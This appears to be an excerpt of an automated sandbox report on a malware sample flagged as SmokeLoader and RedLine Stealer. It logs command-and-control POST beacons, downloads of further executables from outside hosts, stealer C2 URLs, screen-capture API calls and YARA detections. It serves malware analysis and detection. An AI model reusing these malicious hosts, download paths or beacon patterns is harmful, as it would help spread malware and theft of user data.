                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aughe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fviqib.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqexxjno.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hjjvq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xgeyakiifw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xgeyakiifw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: gudintas.atData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3f 24 cf ad 7f 11 dc b7 f0 4d 5b e4 b4 f9 8e ee 61 06 a3 e1 f8 92 93 30 cd f1 bb 61 d4 67 02 20 1b 34 68 8d 0a e8 44 69 81 db fe dc f5 93 7f 76 c5 b4 a7 70 ca 1f 8c 04 a7 2c de 54 26 26 8d 50 45 ed 0e 49 2f 5e 8a 2e d1 f8 8a ef 95 c1 90 f5 d3 37 81 83 e2 0b 4e 84 58 63 a6 83 20 ba 79 29 25 80 e9 ca 80 88 Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vu?$M[a0ag 4hDivp,T&&PEI/^.7NXc y)%
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajhuadbjy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ptxqbvvyee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://seqlxfb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ppidsxxc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://julpewmqko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: gudintas.at
                Source: global trafficHTTP traffic detected: GET /186.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: h170811.srv22.test-hf.su
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhjls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: gudintas.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://diludhd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: gudintas.at
                Source: global trafficHTTP traffic detected: GET /ofdskiewerews/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.149.185.139
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqsawjuwq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: gudintas.at
                Source: Joe Sandbox ViewASN Name: MegaCableSAdeCVMX MegaCableSAdeCVMX
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
                Source: Joe Sandbox ViewIP Address: 211.181.24.133 211.181.24.133
                Source: Joe Sandbox ViewIP Address: 211.181.24.133 211.181.24.133
                Source: explorer.exe, 00000001.00000000.900098420.00007FFA11519000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
                Source: explorer.exe, 00000001.00000000.900098420.00007FFA11519000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
                Source: 6E11.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: 6E11.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/?
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/B
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/Y
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/api
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/api)
                Source: RegAsm.exe, 00000016.00000002.1121991366.00000000014F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apiP
                Source: RegAsm.exe, 00000016.00000002.1121991366.00000000014F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apik
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apil
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apill
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apillr
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apiq
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apiy
                Source: RegAsm.exe, 00000016.00000002.1121991366.00000000014F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/h
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/p
                Source: AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149924480.0000000007C4B000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149924480.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149273611.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.000000000792A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/
                Source: AppLaunch.exe, 00000019.00000002.1149623995.000000000792A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/0
                Source: AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/8yP
                Source: AppLaunch.exe, 00000019.00000002.1149924480.0000000007AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/A
                Source: AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/Fy
                Source: AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/Qy
                Source: AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/api
                Source: AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/api)t%
                Source: AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/api9uU
                Source: AppLaunch.exe, 00000019.00000002.1149273611.00000000053D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/apiH
                Source: AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/apiQu-
                Source: AppLaunch.exe, 00000019.00000002.1149273611.00000000053D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/apil
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malsvchost.exe
                Source: 6E11.exe, 00000015.00000000.1046466838.0000000000892000.00000002.00000001.01000000.00000008.sdmp, 6E11.exe.1.drString found in binary or memory: http://metro.mahapps.com/winfx/xaml/iconpacks
                Source: explorer.exe, 00000001.00000000.896581673.0000000002E89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adob
                Source: 6E11.exe.1.drString found in binary or memory: http://ocsp.sectigo.com0
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegAsm.exe, 00000016.00000002.1122515831.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.1122925275.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 00000001.00000000.896996023.00000000067AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://java.sun.com
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                Source: 6E11.exe.1.drString found in binary or memory: https://sectigo.com/CPS0
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: AppLaunch.exe, 00000019.00000002.1149924480.0000000007A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegAsm.exe, 00000016.00000002.1122515831.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.1122925275.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                Source: RegAsm.exe, 00000016.00000002.1122515831.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.1122925275.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                Source: AppLaunch.exe, 00000019.00000002.1149623995.00000000078FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=.net
                Source: AppLaunch.exe, 00000019.00000002.1149623995.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/setprefs?sig=0_d7toVxfMKzFj4yeYEy5xHRJrV_I%3D&source=en_ignored_notification&
                Source: AppLaunch.exe, 00000019.00000002.1149623995.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8.1%26oq%3D
                Source: unknownDNS traffic detected: queries for: gudintas.at
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00438ECD InternetQueryDataAvailable,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_strlen,HttpSendRequestA,GetProcAddress,InternetQueryDataAvailable,HttpOpenRequestW,InternetCloseHandle,InternetConnectA,GetModuleHandleW,InternetOpenW,InternetReadFile,GetProcAddress,22_2_00438ECD
                Source: global trafficHTTP traffic detected: GET /186.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: h170811.srv22.test-hf.su
                Source: global trafficHTTP traffic detected: GET /ofdskiewerews/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtqsod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gudintas.at

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0.3.file.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.3.aueuggs.2510000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aueuggs.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aueuggs.2500e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.951015355.0000000002531000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.885330632.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.939764066.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.900666807.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.951003696.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00430EEA CreateDCW,GetSystemMetrics,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,BitBlt,SelectObject,DeleteDC,DeleteObject,22_2_00430EEA
                Source: file.exe, 00000000.00000002.900688449.00000000023A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_53b5a63d-8

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 21.0.6E11.exe.890000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
                Source: 0000000F.00000002.950991871.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.900656340.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000F.00000002.951015355.0000000002531000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.900699694.00000000023B7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.900666807.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000F.00000002.951037651.00000000025C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000000F.00000002.951003696.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\6E11.exe, type: DROPPEDMatched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 136
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004100510_2_00410051
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B8FD0_2_0040B8FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FB000_2_0040FB00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004105A20_2_004105A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004119B60_2_004119B6
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_0041005115_2_00410051
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_0040B8FD15_2_0040B8FD
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_0040FB0015_2_0040FB00
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004105A215_2_004105A2
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004119B615_2_004119B6
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0CB6B021_2_6F0CB6B0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0AC7B021_2_6F0AC7B0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0AA7E021_2_6F0AA7E0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0A665021_2_6F0A6650
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0C2D7021_2_6F0C2D70
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F115DD221_2_6F115DD2
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0A8B3021_2_6F0A8B30
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0BA0C021_2_6F0BA0C0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_0156424821_2_01564248
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_0156390821_2_01563908
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_01565B7021_2_01565B70
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_0156927021_2_01569270
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_015638F921_2_015638F9
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_061B0EB321_2_061B0EB3
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_061B284021_2_061B2840
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_061B282021_2_061B2820
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_061B093021_2_061B0930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040A87822_2_0040A878
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004090F822_2_004090F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004118B622_2_004118B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043213022_2_00432130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00421AC822_2_00421AC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040EB6B22_2_0040EB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0042FB7822_2_0042FB78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043330022_2_00433300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00402BFC22_2_00402BFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040E56822_2_0040E568
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0042353E22_2_0042353E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040D60C22_2_0040D60C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0041DE1F22_2_0041DE1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00438ECD22_2_00438ECD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0042475022_2_00424750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00405F8822_2_00405F88
